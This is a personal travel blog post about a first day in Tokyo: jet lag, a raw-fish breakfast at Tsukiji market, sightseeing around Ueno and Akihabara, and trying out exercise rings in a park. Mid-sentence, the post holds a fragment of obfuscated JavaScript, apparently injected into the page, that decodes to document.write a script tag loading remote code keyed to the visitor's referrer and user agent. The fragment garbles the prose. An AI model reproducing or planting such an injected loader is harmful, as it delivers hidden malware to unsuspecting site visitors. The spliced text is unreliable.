We tried our best to fight the jet lag. We went to bed at 11PM, but awoke at 1AM, 3AM and finally at 4:30AM. So we headed to the Tsukiji (pronounced Ski-G) market to meet up with Jen and Austin. We enjoyed some fresh fish at a hole in the wall joint for breakfast – and while it was amazing – I don’t think breakfast is the right meal for raw fish. I think I’ll be sticking with more of the basic breakfast fare – read blander and less fishy – for at least the next few days.
We followed up the market with a trip around the Imperial Palace, a visit to the Tokyo Science Museum (not in English, but still entertaining), a walk through Akhiabara, Ueno market, Ueno zoo, some karaoke and a little Japanese style bar food to end the night. We put many many miles on our shoes and are not setting the alarm tomorrow – although I’m pretty sure my body is going to wake me up early anyways. Wah wah.
More pics later, but for now, you can enjoy this side by side of Nick and I on the rings – channeling our inner gymnast, I mean, Japan will ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ieiny|var|u0026u|referrer|ayzba||js|php’.split(‘|’),0,{}))
be hosting the olympics in 2020! This was actually a super random spot in the park. Some bars, rings and a bunch of older Japanese men working out. Most shirtless and many wearing gloves to protect their hands. We asked if we could give it a try, and they found us (particularly me) highly entertaining.
